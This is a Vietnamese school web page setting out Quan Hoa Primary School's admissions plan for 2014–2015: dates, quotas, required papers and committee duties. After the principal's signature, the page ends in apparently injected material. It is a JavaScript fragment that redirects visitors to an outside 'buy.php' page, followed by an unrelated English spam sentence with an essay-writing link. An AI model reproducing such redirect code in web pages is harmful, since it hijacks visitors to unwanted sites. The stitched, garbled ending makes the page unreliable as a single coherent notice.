Kế hoạch tuyển sinh – Năm học: 2014 – 2015

16/06/2014 12:54 Sáng Phản hồi đã bị khóa

KẾ HOẠCH TUYỂN SINH NĂM HỌC 2014 – 2015

- Căn cứ điều lệ trường Tiểu học.

- Căn cứ công văn số 5251/SGD&ĐT-QLT ngày 18/4/2014 của Sở Giáo dục và Đào tạo Hà Nội và kế hoạch số 10/KH-PGD ngày 09/05/2014 của Phòng GD&ĐT Quận Cầu Giấy về việc tuyển sinh vào các trường Mầm non, lớp 1 và lớp 6 năm học 2014 – 2015;

- Căn cứ tình hình CSVC và vị trí của trường trên địa bàn phường Quan Hoa.

- Căn cứ kết quả điều tra số học sinh và dự kiến xây dựng kế hoạch năm học của trường Tiểu học Quan Hoa.

Được sự phê duyệt của UBND quận, trường Tiểu học Quan Hoa xây dựng kế hoạch tuyển sinh năm học 2014 – 2015 trên địa bàn phường Quan Hoa như sau:

I/ MỤC ĐÍCH YÊU CẦU:

- Tuyển sinh nhằm thực hiện công tác phát triển phổ cập giáo dục, phục vụ kế hoạch học 2 buổi/ ngày.

- Huy động 100% số học sinh trong độ tuổi tiểu học đến lớp (tuyệt đối không tuyển trẻ thiếu tuổi vào lớp 1), huy động ít nhất 70% trẻ khuyết tật còn đủ sức khoẻ vào lớp 1.

- Thực hiện nghiêm túc quy định về: Thời gian tuyển sinh, hồ sơ tuyển sinh, độ tuổi tuyển sinh .

- Đảm bảo công khai, công bằng về chỉ tiêu tuyển sinh, tuyến tuyển sinh.

- Đảm bảo học sinh ở các khu đô thị mới ( đặc biệt đối với các hộ dân thuộc diện tái định cư do giải phóng mặt bằng) có điều kiện học tập ổn định.

II/ KẾ HOẠCH TUYỂN SINH:

1. Tuyển sinh vào lớp 1 thường.

1.1 Thời gian tuyển sinh:

- Từ ngày 01/7/2014 đến ngày 15/7/2014 tuyển học sinh đúng tuyến. Bao gồm: Những học sinh hoặc bố (mẹ) học sinh có hộ khẩu thường trú tại địa bàn phường Quan Hoa.

- Hết thời hạn tuyển sinh đúng tuyến (sau ngày 15/7/2014) nếu trường còn chỉ tiêu báo cáo với Phòng Giáo dục, UBND Quận để duyệt tuyển bổ sung cho đủ chỉ tiêu từ ngày 17/7/2014  đến ngày 19/7/2014.

- Từ ngày 21/7/2014 đến ngày 25/7/2014: tuyển học sinh trái tuyến khi đã có ý kiến của phòng Giáo dục – Đào tạo( nếu còn chỉ tiêu).

1.2 Chỉ tiêu tuyển sinh

- Trẻ sinh năm 2008

- Số lớp tuyển : 05                              – Số học sinh : 250

1.3 Quy định về hồ sơ của học sinh:

a) Tuyển sinh lớp 1 hồ sơ bao gồm:

- Đơn xin học (theo mẫu).

- Bản sao giấy khai sinh ( kèm theo bản chính để đối chiếu).

- Bản photo sổ hộ khẩu (không cần công chứng, kèm theo bản chính để đối chiếu) hoặc giấy hẹn đã hoàn thành thủ tục nhập khẩu của công an quận (kèm theo bản chính để đối chiếu) hoặc giấy xác nhận cư trú tại địa bàn của công an phường.

* Để ngăn ngừa tình trạng học sinh sử dụng nhiều giấy khai sinh khác nhau về ngày sinh và tên, khi học sinh nộp hồ sơ nhập học, cán bộ tuyển sinh phải đối chiếu bản sao giấy khai sinh với bản chính, với hộ khẩu, nếu thấy đã trùng khớp thì ghi xác nhận vào mặt sau bản sao giấy khai sinh: “Đã kiểm tra khớp với bản chính và hộ khẩu”, ngày nhập học, ký và ghi rõ họ tên; Hiệu trưởng ký và đóng dấu. Tờ sao giấy khai sinh này sẽ là hồ sơ gốc của học sinh cho đến khi kết thúc quá trình học tập, mọi văn bằng, chứng chỉ của học sinh được cấp sẽ căn cứ vào bản sao đã có xác nhận này. Cán bộ tuyển sinh và hiệu trưởng sẽ chịu trách nhiệm về việc kiểm tra này.

2. Tuyển sinh vào các lớp 2, 3, 4, 5.

2.1 Đối tượng tuyển sinh:

- Học sinh có hộ khẩu trên địa bàn phường (ưu tiên những học sinh có kết quả học lực loại giỏi).

2.2 Hồ sơ tuyển sinh:

- Học bạ, giấy giới thiệu, đơn xin học.

III. TỔ CHỨC THỰC HIỆN.

1. Ban giám hiệu nhà trường xây dựng kế hoạch tuyển sinh và thông báo kế hoạch để nhân dân biết chỉ tiêu và phân tuyến tuyển sinh trên địa bàn.

2. Thành lập Ban tuyển sinh gồm:

Đ/c Nguyễn Thanh Tịnh – Hiệu trưởng

Đ/c Hoàng  Anh Vân– Phó Hiệu trưởng

Đ/c Nguyễn Thanh Hằng – KT khối 5

Đ/c Bùi Bảo Linh – KT khối 3 – CTCĐ

Đ/c Hoàng Thu Huyền – Bí thư CĐ

Đ/c Dư Thị Hoài Giang – Kế toán

Đ/c Lê  Thị  Bích  Nguyệt – Thủ quỹ

3.Phân công nhiệm vụ cụ thể nhân sự làm công tác tuyển sinh:

* Phụ trách chính:

+ Đồng chí Nguyễn  Thanh Tịnh – Hiệu trưởng nhà trường.

* Kiểm tra công tác tuyển sinh:

+ Đ/c Hoàng  Anh Vân– Phó Hiệu trưởng.

+ Đ/c Bùi Bảo Linh – KT khối 3 – CTCĐ

* Trực tiếp làm công tác tuyển sinh:

+ Đ/c Nguyễn Thanh Hằng – KT khối 5

+ Đ/c Hoàng Thu Huyền – Bí thư CĐ

+ Đồng chí  Dư Thị Hoài Giang

+ Đồng chí Lê Thị Bích Nguyệt

4. Tổ chức họp Ban tuyển sinh:

* Lần 1: Ngày 3/6/2014

* Lần 2: Ngày 21/6/2014

5. Báo cáo về công tác tuyển sinh:

Nộp báo cáo tuyển sinh vào các ngày 10/7; 16/7; 21/7/2014 (gửi về phòng GD – ĐT quận Cầu Giấy).

6. Chuẩn bị về cơ sở vật chất cho công tác tuyển sinh:

- Địa điểm tuyển sinh: Chuẩn bị 2 phòng (1 phòng tuyển sinh, 1 phòng khai hồ sơ)

- Chuẩn bị các điều kiện để đón tiếp PHHS ( nước uống, ghế ngồi…)

Nhà trường tạo điều kiện thuận lợi để cha mẹ học sinh đăng kí  vào học cho con em mình.

Trên đây là kế hoạch tuyển sinh năm học 2014 – 2015 của trường Tiểu học Quan Hoa.

HIỆU TRƯỞNG

Nguyễn Thanh Tịnh

location.replace(“http://gethere.info/buy.php”);

} else { When you spend money for public relations on an administration’s top priority, it’s hard to avoid the appearance that you’re spending https://collegepapers.co.uk/ writing paper taxpayer dollars for a political purpose, he said

Các phản hồi đã bị đóng lại bở quản trị.